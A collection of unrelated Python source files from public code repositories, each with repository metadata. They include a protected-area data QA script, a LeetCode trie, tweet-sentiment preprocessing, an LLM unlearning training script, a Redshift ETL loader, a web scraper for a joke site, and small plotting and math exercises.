Table\n# '''\n \n# field = 'METADATAID'\n\n ########## OPTIONAL ##########\n #### Remove METADATAID = 840 (Russian sites that are restricted and not in Source Table) \n #condition_crit = [840]\n # Remove METADATAID = 840 from the WDPA\n #wdpa_df_no840 = wdpa_df[wdpa_df[field[0]] != condition_crit[0]]\n #invalid_wdpa_pid = wdpa_df_no840[~wdpa_df_no840[field[0]].isin(\n # wdpa_source[field[0]].values)]['WDPA_PID'].values\n ##############################\n\n # Find invalid WDPA_PIDs\n# invalid_wdpa_pid = wdpa_df[~wdpa_df[field].isin(\n# wdpa_source[field].values)]['WDPA_PID'].values\n \n# if return_pid:\n# return invalid_wdpa_pid\n\n# return invalid_wdpa_pid > 0\n\n#######################################################################\n#### 8.2. Invalid: METADATAID present in Source Table, not in WDPA ####\n#### Note: output is METADATAIDs. ####\n#######################################################################\n\n# def invalid_metadataid_not_in_wdpa(wdpa_df, wdpa_point, wdpa_source, return_pid=False):\n# '''\n# Return True if METADATAID is present in the Source Table but not in the Source Table\n# Return list of METADATAIDs for which the METADATAID is not present in the Source Table\n# '''\n \n# field = ['METADATAID']\n\n# # Concatenate all METADATAIDs of the WDPA point and poly tables\n# field_allowed_values = np.concatenate((wdpa_df[field[0]].values,wdpa_point[field[0]].values),axis=0)\n\n# ########## OPTIONAL ##########\n# # Remove METADATA = 840 (Russian sites that are restricted and not in Source Table)\n# #metadataid_wdpa = np.concatenate((wdpa_df[field[0]].values,wdpa_point[field[0]].values),axis=0)\n# #field_allowed_values = np.delete(metadataid_wdpa, np.where(metadataid_wdpa == 840), axis=0)\n# #######################\n \n# # Find METADATAIDs in the Source Table that are not present in the WDPA\n# invalid_metadataid = wdpa_source[~wdpa_source[field[0]].isin(field_allowed_values)]['METADATAID'].values\n \n# if return_pid:\n# return invalid_metadataid\n \n# return len(invalid_metadataid) > 0\n\n############################################################################################\n#### Below is a dictionary that holds all checks' descriptive (as displayed in Excel) ####\n#### and script function names (as displayed in this script, qa.py). ####\n#### These checks are subsequently called by the main functions, poly.py and point.py, ####\n#### to run all checks on the WDPA input feature class attribute table. ####\n############################################################################################\n\n# Checks to be run for both point and polygon data\ncore_checks = [\n{'name': 'duplicate_wdpa_pid', 'func': duplicate_wdpa_pid},\n{'name': 'tiny_rep_area', 'func': area_invalid_rep_area},\n{'name': 'zero_rep_m_area_marine12', 'func': area_invalid_rep_m_area_marine12},\n{'name': 'ivd_rep_m_area_gt_rep_area', 'func': area_invalid_rep_m_area_rep_area},\n{'name': 'ivd_no_tk_area_gt_rep_m_area', 'func': area_invalid_no_tk_area_rep_m_area},\n{'name': 'ivd_no_tk_area_rep_m_area', 'func': invalid_no_take_no_tk_area_rep_m_area},\n{'name': 'ivd_int_crit_desig_eng_other', 'func': invalid_int_crit_desig_eng_other},\n{'name': 'ivd_desig_eng_iucn_cat_other', 'func': invalid_desig_eng_iucn_cat_other},\n{'name': 'dif_name_same_id', 'func': inconsistent_name_same_wdpaid},\n{'name': 'dif_orig_name_same_id', 'func': inconsistent_orig_name_same_wdpaid},\n{'name': 'ivd_dif_desig_same_id', 'func': inconsistent_desig_same_wdpaid},\n{'name': 'ivd_dif_desig_eng_same_id', 'func': inconsistent_desig_eng_same_wdpaid},\n{'name': 'dif_desig_type_same_id', 'func': inconsistent_desig_type_same_wdpaid},\n{'name': 'dif_int_crit_same_id', 'func': inconsistent_int_crit_same_wdpaid},\n{'name': 'dif_no_take_same_id', 'func': inconsistent_no_take_same_wdpaid},\n{'name': 'dif_status_same_id', 'func': inconsistent_status_same_wdpaid},\n{'name': 'dif_status_yr_same_id', 'func': inconsistent_status_yr_same_wdpaid},\n{'name': 'dif_gov_type_same_id', 'func': inconsistent_gov_type_same_wdpaid},\n{'name': 'dif_own_type_same_id', 'func': inconsistent_own_type_same_wdpaid},\n{'name': 'dif_mang_auth_same_id', 'func': inconsistent_mang_auth_same_wdpaid},\n{'name': 'dif_mang_plan_same_id', 'func': inconsistent_mang_plan_same_wdpaid},\n{'name': 'ivd_dif_verif_same_id', 'func': inconsistent_verif_same_wdpaid},\n{'name': 'ivd_dif_metadataid_same_id', 'func': inconsistent_metadataid_same_wdpaid},\n{'name': 'ivd_dif_sub_loc_same_id', 'func': inconsistent_sub_loc_same_wdpaid},\n{'name': 'ivd_dif_parent_iso3_same_id', 'func': inconsistent_parent_iso3_same_wdpaid},\n{'name': 'ivd_dif_iso3_same_id', 'func': inconsistent_iso3_same_wdpaid},\n{'name': 'ivd_pa_def', 'func': invalid_pa_def},\n{'name': 'ivd_desig_eng_international', 'func': invalid_desig_eng_international},\n{'name': 'ivd_desig_type_international', 'func': invalid_desig_type_international},\n{'name': 'ivd_desig_eng_regional', 'func': invalid_desig_eng_regional},\n{'name': 'ivd_desig_type_regional', 'func': invalid_desig_type_regional},\n{'name': 'ivd_int_crit', 'func': invalid_int_crit_desig_eng_ramsar_whs},\n{'name': 'ivd_desig_type', 'func': invalid_desig_type},\n{'name': 'ivd_iucn_cat', 'func': invalid_iucn_cat},\n{'name': 'ivd_iucn_cat_unesco_whs', 'func': invalid_iucn_cat_unesco_whs},\n{'name': 'ivd_marine', 'func': invalid_marine},\n{'name': 'check_no_take_marine0', 'func': invalid_no_take_marine0},\n{'name': 'ivd_no_take_marine12', 'func': invalid_no_take_marine12},\n{'name': 'check_no_tk_area_marine0', 'func': invalid_no_tk_area_marine0},\n{'name': 'ivd_no_tk_area_no_take', 'func': invalid_no_tk_area_no_take},\n{'name': 'ivd_status', 'func': invalid_status},\n{'name': 'ivd_status_yr', 'func': invalid_status_yr},\n{'name': 'ivd_gov_type', 'func': invalid_gov_type},\n{'name': 'ivd_own_type', 'func': invalid_own_type},\n{'name': 'ivd_verif', 'func': invalid_verif},\n{'name': 'check_parent_iso3', 'func': invalid_parent_iso3},\n{'name': 'check_iso3', 'func': invalid_iso3},\n{'name': 'ivd_status_desig_type', 'func': invalid_status_desig_type},\n{'name': 'ivd_character_name', 'func': forbidden_character_name},\n{'name': 'ivd_character_orig_name', 'func': forbidden_character_orig_name},\n{'name': 'ivd_character_desig', 'func': forbidden_character_desig},\n{'name': 'ivd_character_desig_eng', 'func': forbidden_character_desig_eng},\n{'name': 'ivd_character_mang_auth', 'func': forbidden_character_mang_auth},\n{'name': 'ivd_character_mang_plan', 'func': forbidden_character_mang_plan},\n{'name': 'ivd_character_sub_loc', 'func': forbidden_character_sub_loc},\n{'name': 'nan_present_name', 'func': nan_present_name},\n{'name': 'nan_present_orig_name', 'func': nan_present_orig_name},\n{'name': 'nan_present_desig', 'func': nan_present_desig},\n{'name': 'nan_present_desig_eng', 'func': nan_present_desig_eng},\n{'name': 'nan_present_mang_auth', 'func': nan_present_mang_auth},\n{'name': 'nan_present_mang_plan', 'func': nan_present_mang_plan},\n{'name': 'nan_present_sub_loc', 'func': nan_present_sub_loc},]\n\n# Checks to be run for polygon data only (includes GIS_AREA and/or GIS_M_AREA)\narea_checks = [\n{'name': 'gis_area_gt_rep_area', 'func': area_invalid_too_large_gis},\n{'name': 'rep_area_gt_gis_area', 'func': area_invalid_too_large_rep},\n{'name': 'gis_m_area_gt_rep_m_area', 'func': area_invalid_too_large_gis_m},\n{'name': 'rep_m_area_gt_gis_m_area', 'func': area_invalid_too_large_rep_m},\n{'name': 'tiny_gis_area', 'func': area_invalid_gis_area},\n{'name': 'no_tk_area_gt_gis_m_area', 'func': area_invalid_no_tk_area_gis_m_area},\n{'name': 'ivd_gis_m_area_gt_gis_area', 'func': area_invalid_gis_m_area_gis_area},\n{'name': 'zero_gis_m_area_marine12', 'func': area_invalid_gis_m_area_marine12},\n{'name': 'ivd_marine_designation', 'func': area_invalid_marine},]\n\n# Checks for polygons\npoly_checks = core_checks + area_checks\n\n# Checks for points (area checks excluded)\npt_checks = core_checks\n\n#######################\n#### END OF SCRIPT ####\n#######################","repo_name":"Yichuans/wdpa-qa","sub_path":"wdpa/qa.py","file_name":"qa.py","file_ext":"py","file_size_in_byte":75438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"620783964","text":"class Trie:\n\n def __init__(self, val=None):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.children = {}\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n node = self.children\n for w in word:\n node.setdefault(w, {})\n node = node.get(w)\n node['is_end'] = True\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n node = self.children\n for w in word:\n if w not in node:\n return False\n node = node.get(w, {})\n if node.get('is_end', False):\n return True\n return False\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n node = self.children\n for w in prefix:\n if w not in node:\n return False\n node = node.get(w, {})\n return True\n\n def __repr__(self):\n return str(self.val)\n\n\nif __name__ == '__main__':\n obj = Trie()\n obj.insert('apple')\n obj.insert('bad')\n obj.insert('bottle')\n obj.insert('boot')\n obj.insert('applc')\n param_2 = obj.search('apple')\n param_3 = obj.startsWith('app')\n param_4 = obj.search('app')\n obj.insert('app')\n param_5 = obj.search('app')\n\n print(param_2, param_3, param_4, param_5)\n","repo_name":"jacsice/leetcode","sub_path":"208-implement-trie-prefix-tree.py","file_name":"208-implement-trie-prefix-tree.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71788879274","text":"#!/usr/bin/env python3 \n\ninp = input() \n\n\ndef isBeautiful(n: str):\n arr = list(n.replace(\" \",\"\")) # remove possilble spaces from input and convert everything to list\n for i in range(len(arr)):\n x = arr.pop()\n if str(x) in arr : \n return False \n return True \n\ndef nextBeautiful(n: str):\n for i in range(int(n)+1,10000):\n if isBeautiful(str(i)):\n print(int(i))\n break \n\n\nnextBeautiful(inp)\n","repo_name":"Zeus-HackOlympus/CP","sub_path":"codeforces/beautiful_year.py","file_name":"beautiful_year.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1165328740","text":"# Preprocessing code to get initial data view and exploration of the train.csv file\n# This is specifically for the Kaggle Twitter sentiment analysis project, but can be adapted for any dataset.\n# by svadivazhagu, May 2020\n\nimport re\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\n\n#Load the data in\ndef loadData(fp=\"../test.csv\"):\n train = pd.read_csv(fp)\n return train\n\n#Text-based information about the dataset\ndef dataStats(train):\n #Get an example viewing of what some of the data looks like + num columns\n train.head()\n\n #Show how many samples there are as well as num attributes\n print(f'{train.shape[0]} tweets, with {train.shape[1]} attributes')\n\n #Show how many tweets exist per sentiment category\n train['sentiment'].value_counts()\n\n #Average the length of the tweets for each category\n neutral, positive, negative = int((train.loc[train['sentiment'] == 'neutral'])['text'].str.len().mean()), \\\n int((train.loc[train['sentiment'] == 'positive'])['text'].str.len().mean()),\\\n int((train.loc[train['sentiment'] == 'negative'])['text'].str.len().mean())\n\n print(f' On average, {neutral} chars. per neutral tweet, {positive} per positive, and {negative} per negative')\n\ndef visualStats(train):\n\n #count tweets per sentiment category\n plt.figure(figsize=(7,5))\n plt.title('Tweets per sentiment category')\n sns.countplot(train['sentiment'])\n plt.show()\n\n #check the distribution of each category's tweet length\n neutral = train[train['sentiment'] == 'neutral']['text'].apply(lambda x: len(str(x)))\n positive = train[train['sentiment'] == 'positive']['text'].apply(lambda x: len(str(x)))\n negative = train[train['sentiment'] == 'negative']['text'].apply(lambda x: len(str(x)))\n fig, ax = plt.subplots()\n sns.distplot(neutral, ax=ax, color='green')\n sns.distplot(positive, ax=ax, color='blue')\n sns.distplot(negative, ax=ax, color='red')\n plt.title('Length of tweet based on sentiment')\n plt.legend(['neutral', 'positive', 'negative'])\n plt.show()\n\ndef cleanText(tweet):\n #list of emoji patterns appearing in the tweets to be removed\n emoji_pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"]+\", flags=re.UNICODE)\n text = str(tweet)\n # Remove emojis\n text = emoji_pattern.sub(r'', text)\n # Remove twitter handles (@___)\n text = re.sub(r'@\\w+', '', text)\n # Remove links after research that t.co uses http still\n text = re.sub(r'http.?://[^/s]+[/s]?', '', text)\n return text.strip().lower()\n\n\ndef wordcloud(train, text='text'):\n # Join all tweets in one string\n corpus = \" \".join(str(review) for review in train[text])\n print(f\"There are {len(corpus)} words used.\")\n\n wordcloud = WordCloud(max_font_size=50,\n max_words=100,\n background_color=\"white\").generate(corpus)\n\n plt.figure(figsize=(30, 30))\n plt.imshow(wordcloud, interpolation=\"bilinear\")\n plt.axis(\"off\")\n plt.show()\n\nif __name__ == '__main__':\n train = loadData()\n dataStats(train)\n visualStats(train)\n\n train['text'] = train['text'].apply(lambda x: cleanText(x))\n\n #Check the most common words across the cleaned tweets\n wordcloud(train=train, text = 'text')","repo_name":"svadivazhagu/Tweet-Sentiment-Extraction","sub_path":"Preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5859768878","text":"import math\n\n[a,b,g] = input(\"Παρακαλώ εισάγετε τιμές α,β,γ (χωρισμένες με κόμμα):\").split(',')\na = int(a)\nb = int(b)\ng = int(g)\n\ndelta = b*b-4*a*g\n\nif delta > 0:\n delta = math.sqrt(delta)\n x1 = (-b+delta)/(2*a)\n x2 = (-b-delta)/(2*a)\n print(\"Οι 2 πραγματικές ρίζες είναι:\",x1,x2)\nelif delta == 0:\n delta = math.sqrt(delta)\n x1 = (-b)/(2*a)\n print(\"Η μια πραγματική και διπλή ριζα είναι:\",x1)\nelse:\n print(\"Δεν υπάρχουν πραγματικές ρίζες\")\n","repo_name":"AndreasTsoumanis/Python-Coursity","sub_path":"Coursityex2.1.py","file_name":"Coursityex2.1.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38654949516","text":"from client.api.base_class import BaseAPIClass\nfrom config import ConfigClass\n\n\nclass ProjectUsersApis(BaseAPIClass):\n def list_users(self, project_geid):\n\n url = ConfigClass.project_list_user_url % project_geid\n res = self._send_request(url, method='GET')\n\n return res.json().get('result', {})\n\n def update_user_role(self, project_geid, username, old_role, new_role):\n\n payload = {\n 'old_role': old_role,\n 'new_role': new_role,\n }\n\n url = ConfigClass.project_user_ops_url % (project_geid, username)\n res = self._send_request(url, method='PUT', json=payload)\n\n return res.json().get('result', {})\n","repo_name":"BrainModes/sdk","sub_path":"client/api/project_users.py","file_name":"project_users.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37602250388","text":"import os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nfrom typing import Dict, Optional, Sequence\nfrom peft import (\n get_peft_model,\n)\nfrom datasets import load_dataset\nfrom dataclasses import dataclass, field\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport argparse\n\nimport torch\nimport transformers\n\nimport LLMIF as llmif\nfrom LLMIF import get_model, get_tokenizer, get_model_tokenizer\nfrom LLMIF import TrainDataset, TestDataset\nfrom LLMIF import Unlearner\nfrom LLMIF.data_loader import IGNORE_INDEX \nfrom LLMIF.unlearning import UnlearningArguments\n\nCONFIG_PATH = \"/home/hl3352/LLMs/LLMsInfluenceFunc/configs/config_test.json\"\n\n\ndef smart_tokenizer_and_embedding_resize(\n special_tokens_dict: Dict,\n tokenizer: transformers.PreTrainedTokenizer,\n model: transformers.PreTrainedModel,\n):\n \"\"\"Resize tokenizer and embedding.\n\n Note: This is the unoptimized version that may make your embedding size not be divisible by 64.\n \"\"\"\n num_new_tokens = tokenizer.add_special_tokens(special_tokens_dict)\n model.resize_token_embeddings(len(tokenizer))\n\n if num_new_tokens > 0:\n input_embeddings = model.get_input_embeddings().weight.data\n output_embeddings = model.get_output_embeddings().weight.data\n\n input_embeddings_avg = input_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\n output_embeddings_avg = output_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\n\n input_embeddings[-num_new_tokens:] = input_embeddings_avg\n output_embeddings[-num_new_tokens:] = output_embeddings_avg\n\n\n@dataclass\nclass DataCollatorForSupervisedDataset(object):\n \"\"\"Collate examples for supervised fine-tuning.\"\"\"\n\n tokenizer: transformers.PreTrainedTokenizer\n\n def __call__(self, instances: Sequence[Dict]) -> Dict[str, torch.Tensor]:\n input_ids = tuple([instance[0] for instance in instances])\n labels = tuple([instance[1] for instance in instances])\n input_ids = torch.nn.utils.rnn.pad_sequence(\n input_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id\n )\n labels = torch.nn.utils.rnn.pad_sequence(labels, batch_first=True, padding_value=IGNORE_INDEX)\n return dict(\n input_ids=input_ids,\n labels=labels,\n attention_mask=input_ids.ne(self.tokenizer.pad_token_id),\n )\n\n\ndef make_supervised_data_module(tokenizer: transformers.PreTrainedTokenizer, config) -> Dict:\n \"\"\"Make dataset and collator for supervised fine-tuning.\"\"\"\n # train_dataset = SupervisedDataset(tokenizer=tokenizer, data_path=data_args.data_path)\n train_dataset = TrainDataset(config['train_data_path'], tokenizer)\n unlearn_dataset = TestDataset(config['unlearn_data_path'], tokenizer)\n data_collator = DataCollatorForSupervisedDataset(tokenizer=tokenizer)\n return dict(train_dataset=train_dataset, unlearn_dataset=unlearn_dataset, eval_dataset=None, data_collator=data_collator)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config_path', default=CONFIG_PATH, type=str)\n args = parser.parse_args()\n config_path = args.config_path\n\n llmif.init_logging()\n config = llmif.get_config(config_path)\n model_config = config['model']\n print(config)\n\n parser = transformers.HfArgumentParser((UnlearningArguments))\n unlearning_args, = parser.parse_dict(config['unlearning'], allow_extra_keys=True)\n print(unlearning_args)\n\n model, tokenizer = get_model_tokenizer(model_config)\n\n special_tokens_dict = dict()\n if tokenizer.pad_token is None:\n special_tokens_dict[\"pad_token\"] = DEFAULT_PAD_TOKEN\n if tokenizer.eos_token is None:\n special_tokens_dict[\"eos_token\"] = DEFAULT_EOS_TOKEN\n if tokenizer.bos_token is None:\n special_tokens_dict[\"bos_token\"] = DEFAULT_BOS_TOKEN\n if tokenizer.unk_token is None:\n special_tokens_dict[\"unk_token\"] = DEFAULT_UNK_TOKEN\n\n smart_tokenizer_and_embedding_resize(\n special_tokens_dict=special_tokens_dict,\n tokenizer=tokenizer,\n model=model,\n )\n\n\n# if torch.__version__ >= \"2\":\n# model = torch.compile(model)\n\n data_module = make_supervised_data_module(tokenizer=tokenizer, config=config[\"data\"])\n unlearner = Unlearner(model=model, tokenizer=tokenizer, args=unlearning_args, **data_module)\n turns_num = 0\n while True:\n print(\"-----\" * 20)\n print(f\"impair and repair turn: {turns_num}\")\n print(\"before impair\")\n unlearner.impair()\n print(\"before repair\")\n unlearner.repair()\n\n unlearner.save_state()\n unlearner.save_model(output_dir=unlearning_args.output_dir + f\"/{turns_num}\")\n turns_num += 1\n\n if turns_num >= 200:\n break\n\n# if unlearner.unlearn_callback.probs < unlearning_args.impair_break_threshold:\n# print(f\"{unlearning_args.output_dir}\")\n# break\n\n unlearner.save_state()\n unlearner.save_model(output_dir=unlearning_args.output_dir)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"huawei-lin/LLMsInfluenceFunc","sub_path":"unlearn.py","file_name":"unlearn.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11156134089","text":"# '''\r\n# B 달러 빌림\r\n# R 퍼센트 이자\r\n# 매월 말 과외비 M 달러\r\n# '''\r\n#\r\n#\r\n# T = int(input())\r\n# for tc in range(T):\r\n# R, B, M = list(map(float, input().split()))\r\n#\r\n# inter = 0\r\n# cnt = 0\r\n# while True:\r\n# cnt += 1\r\n# a = (B * R / 100) + 0.00000001\r\n# inter = round(a, 2)\r\n# # print(inter)\r\n# B = B + inter - M\r\n# if B <= 0:\r\n# print(cnt)\r\n# break\r\n# if cnt > 1200:\r\n# print('impossible')\r\n# break\r\n\r\na = 2.025 + 0.000000001\r\nb = round(a, 2)\r\nprint(b)","repo_name":"HoooDev/boj","sub_path":"9333.py","file_name":"9333.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27935197390","text":"class Solution(object):\n def constructMaximumBinaryTree(self, nums):\n root = TreeNode(max(nums))\n index = nums.index(max(nums))\n if index > 0:\n root.left = self.constructMaximumBinaryTree(nums[:index])\n if index < len(nums)-1:\n root.right = self.constructMaximumBinaryTree(nums[index+1:])\n return root\n\n################### 递归思路 ####################\n# 方法作用极简化:判断一个结点的情况\n# 方法作用描述:参数给一个数组,取该数组的最大值作为结点,并返回该结点\n# 递归:根的左右孩子都需要剩余数组里的最大值作为结点,使用递归\nclass Solution(object):\n def constructMaximumBinaryTree(self, nums):\n root = TreeNode(max(nums))\n return root","repo_name":"linwt/nowcoder-leetcode","sub_path":"leetcode_Python/654.最大二叉树.py","file_name":"654.最大二叉树.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"zh","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"489630416","text":"# ERRO Exception line 9\nTAMVETOR = 20;\n\nvetor = [0] * TAMVETOR;\n\nindex = 1;\n\nwhile index < TAMVETOR:\n tty = int(input());\n if tty < 10:\n vetor[ (TAMVETOR) - index] = tty;\n index+=1;\n\nfor index,item in enumerate(vetor):\n print(\"X[%d] = %s\" % ( index , item ));","repo_name":"gilberto-009199/MyPython","sub_path":"Tec.Progam.II/ACS/ACI/TrocaVetor1175.py","file_name":"TrocaVetor1175.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33927425156","text":"from grader_toolkit import Student, Assignment, Grade # noqa: F401\nimport zipfile\nimport os.path\nfrom io import StringIO\n\n\ndef gen_smartsite_upload(assignment, gtemplate, outfn):\n # type: (Assignment, str) -> None\n aname = assignment.name\n gmap = {}\n for g in assignment.grades:\n dispid = g.student.email.split('@')[0]\n gmap[dispid] = g\n idmap = {}\n gradestr = StringIO()\n gformat = \"{0},{1},{2.student.name},{2.grade}\\n\"\n for line in gtemplate:\n l = line.split(',')\n if len(l) == 5 and l[0] in gmap:\n g = gmap[l[0]]\n idmap[l[0]] = l[1]\n gradestr.write(gformat.format(dispid,\n l[1],\n g))\n else:\n gradestr.write(line)\n with zipfile.ZipFile(outfn, 'w') as outarchive:\n path = os.path.join(aname, 'grades.csv')\n outarchive.writestr(path, gradestr.getvalue())\n gradestr.close()\n for g in assignment.grades:\n dispid = g.student.email.split('@')[0]\n outid = idmap[dispid]\n stfolderfmt = \"{0}({1})\"\n if g.notes:\n path = os.path.join(aname,\n stfolderfmt.format(g.student.name, outid),\n \"comments.txt\")\n outarchive.writestr(path, g.notes)\n\n\nupload_formats = {\n 'smartsite': gen_smartsite_upload\n}\n","repo_name":"class4kayaker/grader_toolkit","sub_path":"src/grader_toolkit/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20163182045","text":"import configparser\nimport psycopg2\nfrom sql_queries import copy_table_queries, insert_table_queries\nfrom time import time\n\n\ndef load_staging_tables(cur, conn):\n \"\"\"\n Run querys to load staging tables.\n \n Iterate over a list of staging table load queries to execute and commit to.\n \n Parameters:\n Argument1: Cursor to connect to database\n Argument2: Connection to data\n \"\"\"\n for query in copy_table_queries:\n print(\"-----------------------------------------\\n \\\n Query running:\\n {}\".format(query))\n t0 = time()\n cur.execute(query)\n conn.commit()\n loadTime = time()-t0\n print(\"\\nDone in: {0:.2f} sec\\n\".format(loadTime))\n\n\ndef insert_tables(cur, conn):\n \"\"\"\n Run querys to create tables.\n \n Iterate over a list of insert table queries to execute and commit to.\n \n Parameters:\n Argument1: Cursor to connect to database\n Argument2: Connection to data\n \"\"\"\n for query in insert_table_queries:\n print(\"-----------------------------------------\\n \\\n Query running:\\n {}\".format(query))\n t0 = time()\n cur.execute(query)\n conn.commit()\n loadTime = time()-t0\n print(\"\\nDone in: {0:.2f} sec\\n\".format(loadTime))\n\n\ndef main():\n \"\"\"\n Main function that manages the ETL process.\n        \n        Connect to Redshift cluster database and inserts data from S3 storage.\n \"\"\"\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n load_staging_tables(cur, conn)\n insert_tables(cur, conn)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"davidsondefaria/DataWarehouse-Udacity4","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39567671985","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 10 15:32:55 2019\n\n@author: natasha_yang\n\n@e-mail: ityangna0402@163.com\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfig = plt.figure()#定义一个图像窗口\nax = Axes3D(fig)#在窗口上添加3D坐标轴\n\nx_data = np.arange(-4, 4, 0.25)\ny_data = np.arange(-4, 4, 0.25)\nx_mesh, y_mesh = np.meshgrid(x_data, y_data)\nz_mesh = np.sin(np.sqrt(x_mesh**2 + y_mesh**2))\n#rstride:row的跨度,cstride:column的跨度,rainbow填充颜色\nax.plot_surface(x_mesh, y_mesh, z_mesh, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))\n#添加xy平面的等高线,zdir选择了x,效果将会是对于 XZ 平面的投影\nax.contourf(x_mesh, y_mesh, z_mesh, zdir='z', offset=-2, cmap=plt.get_cmap('rainbow'))\n\nplt.show()","repo_name":"yangnaGitHub/LearningProcess","sub_path":"display/matplotlib_06.py","file_name":"matplotlib_06.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34209318418","text":"#!/usr/bin/env python3\n# encoding='utf-8'\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\n\nclass Qiushi(object):\n def __init__(self):\n self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X \\\n 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 \\\n Safari/537.36'}\n self.baseUrl = 'https://www.qiushibaike.com'\n self.spilUrl = 'https://www.qiushibaike.com/8hr/page/'\n self.file = open('E:/pythonWork/pythonSipder/results/qiushibaike.txt\\\n ', 'a+', encoding='utf-8')\n\n def spider(self, html):\n soup = BeautifulSoup(html, 'lxml')\n divs = soup.find_all('div', re.compile('^article'))\n for div in divs:\n if div.find_all('div', 'thumb'):\n continue\n elif div.find_all('div', 'content'):\n self.file.write(div.span.get_text())\n self.file.write('-----------------')\n\n def craw(self):\n for i in range(5):\n if i == 0:\n r = requests.get(self.baseUrl, self.headers)\n self.spider(r.text)\n else:\n r = requests.get(self.spilUrl + str(i), self.headers)\n self.spider(r.text)\n\nif __name__ == '__main__':\n obj_spider = Qiushi()\n obj_spider.craw()\n","repo_name":"yitengcheng/pythonSipder","sub_path":"get_qiushibaike.py","file_name":"get_qiushibaike.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29091719668","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow_datasets.public_api as tfds\nfrom ..model_loader import DatasetModelLoader\n\n\nclass Emnist(DatasetModelLoader):\n\n def get_dataset(self, mislabelling_percentage=0): # https://www.tensorflow.org/datasets/catalog/emnist\n ds_train = tfds.load('emnist', split='train[:10%]')\n ds_test = tfds.load('emnist', split='test[:50%]')\n\n X_train = []\n y_train = []\n for sample in ds_train:\n X_train.append(sample['image'].numpy() / 255.0)\n y_train.append(sample['label'].numpy())\n\n X_test = []\n y_test = []\n for sample in ds_test:\n X_test.append(sample['image'].numpy() / 255.0)\n y_test.append(sample['label'].numpy())\n\n x_train = np.asarray(X_train)\n y_train = np.asarray(y_train)\n x_test = np.asarray(X_test)\n y_test = np.asarray(y_test)\n\n return x_train, y_train, x_test, y_test\n\n # Image classification task\n def get_compiled_model(self, optimizer: str, metric: str, train_data): # https://www.tensorflow.org/tutorials/quickstart/beginner\n tf_model = tf.keras.models.Sequential(\n [\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation=\"relu\"),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(62, activation=\"softmax\"),\n ]\n )\n\n tf_model.compile(\n optimizer=optimizer, loss=\"sparse_categorical_crossentropy\", metrics=[metric]\n )\n return tf_model\n\n def get_loss_function(self):\n return 